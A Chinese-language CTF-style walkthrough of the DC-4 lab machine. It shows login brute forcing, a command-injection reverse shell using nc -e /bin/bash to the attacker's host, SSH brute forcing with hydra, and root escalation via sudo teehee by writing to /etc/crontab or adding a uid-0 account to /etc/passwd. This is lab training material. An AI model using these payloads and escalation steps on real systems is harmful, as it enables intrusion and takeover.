DC-4
环境配置
攻击机和靶机均设置NAT,靶机记得设置获取MAC
步骤
一、信息收集
1、使用nmap扫描扫描到192.168.2.20,开放了22和80端口
1 | 我这里用arp-scan -l |
2、然后访问一下80端口
3、提示是需要admin来登录,而且没有其他的限制,尝试爆破。
密码是happy(我这里是因为kali里的burp不是专业版跑起来很慢,直接只放了一个密码)
4、登录之后页面有一个可以执行命令的页面
可以执行ls df du等命令 抓包试下
二、反弹shell
1、既然命令可以直接显示,那就可以构造直接反弹shell了,使用burp抓包,修改radio的参数如下:
1 | radio=nc+192.168.12.149+9999+-e+/bin/bash&submit=Run |
开始反弹shell,然后再kali中设置监听,成功反弹shell
2、使用python获取到交互模式
python -c ‘import pty;pty.spawn(“/bin/bash”)’
3、进入到/home目录下,查看到有三个用户,但是只有jim用户下有文件
查看backups目录下的文件,看到了jim用户的密码本
三、ssh登录靶机
1、将其密码本复制出来,因为靶机还开放了22端口,所以可以进行ssh的爆破,这里我使用的是hydra工具
hydra -l jim -P password.txt -t 10 ssh://192.168.12.149
成功得到jim用户的密码为:jibril04
2、登录
3、最后在var/mail目录下看到一封邮件,得到charles的密码为: ^xHhA&hvim0y
4、切换为charles用户,然后登录,尝试切换为root权限,但是失败了
5、用sudo -l看看还有什么用户能使用root,发现teehee用户可以不用输入密码得到root特权
四、提权
两种方式:使用crontab提权和添加新用户提权
使用crontab提权
基本过程:向定时任务执行脚本/etc/crontab文件中写入一个新的定时任务,然后通过teehee的sudo提升权限,再以 root身份写入crontab计划任务通过执行获取root权限
操作过程如下:
1、echo root chmod 4777 /bin/sh > /etc/crontab
2、sudo teehee /etc/crontab,然后写入的内容:* * * * * root chmod 4777 /bin/sh
(时间部分全部填写为*,默认这个定时任务每分钟执行一次。通过执行的脚本将 /bin/sh 的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限。)
3、ls -la /bin/sh
4、/bin/sh
添加新用户提权
添加一个admin账户,然后使用teehee执行直接写入 passwd中,然后切换为创建的admin用户。
1、echo “test::0:0:::/bin/bash”
2、sudo teehee -a /etc/passwd
3、输入:test::0:0:::/bin/bash
4、然后ctrl+c退出,再su test切换用户,即可获得root权限设置uid和gid都为0,那么这个用户就相当于root
格式:[用户名]:[密码]:[uid]:[gid]:[身份描述]:[主目录]:[登录的 shell]
我这里使用的是添加新用户提权
知识点总结
1、后台密码爆破,使用burp爆破,工具爆破等等都可以
2、命令注入漏洞
3、反弹shell的命令
4、利用teehee命令进行提权(这里使用crontab提权和添加新用户提权)